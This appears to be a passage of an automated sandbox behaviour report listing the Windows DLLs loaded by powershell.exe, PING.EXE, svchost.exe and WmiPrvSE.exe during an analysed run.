Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
